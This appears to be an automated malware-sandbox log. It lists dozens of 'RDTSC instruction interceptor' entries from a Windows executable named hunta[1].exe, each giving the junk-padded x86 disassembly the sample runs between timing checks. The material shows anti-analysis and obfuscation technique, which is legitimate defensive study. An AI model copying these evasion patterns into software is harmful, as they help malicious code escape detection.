Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4CDF second address: 11A4CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1130EED second address: 1130EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1130EF3 second address: 1130EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4E5C second address: 11A4E77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF2E55A2C26h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E55A2C2Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4E77 second address: 11A4E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4E97 second address: 11A4EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF2E55A2C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4EA6 second address: 11A4EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4EAA second address: 11A4EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4EB0 second address: 11A4EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4EB6 second address: 11A4EBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4FFE second address: 11A5003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A518E second address: 11A51AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 jmp 00007FF2E55A2C36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A51AE second address: 11A51B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 113CA95 second address: 113CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 113CAA0 second address: 113CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A985E second address: 11A986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A9E2C second address: 11A9E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A9E47 second address: 11A9E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jno 00007FF2E55A2C26h 0x00000010 jng 00007FF2E55A2C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A954D second address: 11A956B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A956B second address: 11A9586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF2E55A2C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11AA3D4 second address: 11AA3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11AA3DA second address: 11AA3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11AA3E0 second address: 11AA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B41DA second address: 11B41E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2B83 second address: 11B2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a jmp 00007FF2E5514DECh 0x0000000f jns 00007FF2E5514DE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2CF6 second address: 11B2D02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2D02 second address: 11B2D12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E5514DE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2D12 second address: 11B2D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2E65 second address: 11B2E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2E6B second address: 11B2E78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E55A2C28h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2FE7 second address: 11B2FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B38DF second address: 11B3918 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF2E55A2C2Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF2E55A2C38h 0x00000019 jnl 00007FF2E55A2C26h 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B3918 second address: 11B3928 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DF2h 0x00000008 jbe 00007FF2E5514DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 115C543 second address: 115C55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f jg 00007FF2E55A2C26h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 115C55C second address: 115C579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jbe 00007FF2E5514DE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FF2E5514DE6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B404A second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnp 00007FF2E55A2C26h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B4059 second address: 11B405E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B405E second address: 11B4066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2832 second address: 11B2836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2836 second address: 11B2843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B2843 second address: 11B284D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176C44 second address: 1176C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176C48 second address: 1176C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176C4C second address: 1176C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176C52 second address: 1176C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176C57 second address: 1176CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF2E55A2C28h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a adc edi, 41F36D34h 0x00000030 lea eax, dword ptr [ebp+1247C9A6h] 0x00000036 mov ecx, dword ptr [ebp+122D2A4Dh] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176CA3 second address: 1176CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176CA7 second address: 1176CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1176CAB second address: 115BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E5514DEDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 jmp 00007FF2E5514DEEh 0x00000019 popad 0x0000001a pop edi 0x0000001b nop 0x0000001c call dword ptr [ebp+122D2037h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF2E5514DF0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1177397 second address: 11773A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11773A4 second address: 11773A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11778A3 second address: 11778D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF2E55A2C39h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 53426DAFh 0x00000011 push 00000004h 0x00000013 movzx edx, ax 0x00000016 nop 0x00000017 push esi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1177DF5 second address: 1177DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1178067 second address: 115C543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f call dword ptr [ebp+1244E4F4h] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FF2E55A2C26h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7D58 second address: 11B7D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7EF6 second address: 11B7EFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7EFB second address: 11B7F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF2E5514DE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7F08 second address: 11B7F19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7F19 second address: 11B7F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7F1D second address: 11B7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF2E55A2C26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B7F2B second address: 11B7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8076 second address: 11B8080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8080 second address: 11B8086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8086 second address: 11B80C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF2E55A2C26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FF2E55A2C28h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FF2E55A2C33h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF2E55A2C2Bh 0x00000026 jmp 00007FF2E55A2C2Fh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B80C4 second address: 11B80CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B824B second address: 11B8257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FF2E55A2C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8257 second address: 11B825D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B83F2 second address: 11B83F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B83F6 second address: 11B842D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF2E5514E05h 0x0000000c jg 00007FF2E5514DE6h 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 ja 00007FF2E5514DE8h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B842D second address: 11B8467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8467 second address: 11B846D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B85D9 second address: 11B85E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF2E55A2C26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B85E9 second address: 11B85F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B873A second address: 11B8751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8751 second address: 11B8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8757 second address: 11B8781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E55A2C26h 0x0000000a popad 0x0000000b jbe 00007FF2E55A2C43h 0x00000011 jmp 00007FF2E55A2C37h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B8781 second address: 11B87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF2E5514DEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11B88ED second address: 11B88F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11BE5F9 second address: 11BE64D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF2E5514DF2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnl 00007FF2E5514DE6h 0x0000001d jmp 00007FF2E5514DF4h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007FF2E5514DECh 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C13A2 second address: 11C13BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF2E55A2C2Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C13BE second address: 11C13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C13C2 second address: 11C13D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C26h 0x00000011 jno 00007FF2E55A2C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C13D9 second address: 11C13E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C16E3 second address: 11C16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C1877 second address: 11C187F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C52E5 second address: 11C5307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E55A2C33h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C999D second address: 11C99E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF2E5514E0Bh 0x0000000c jmp 00007FF2E5514DF7h 0x00000011 jmp 00007FF2E5514DEEh 0x00000016 jmp 00007FF2E5514DEFh 0x0000001b popad 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C99E5 second address: 11C99EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C99EF second address: 11C99FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
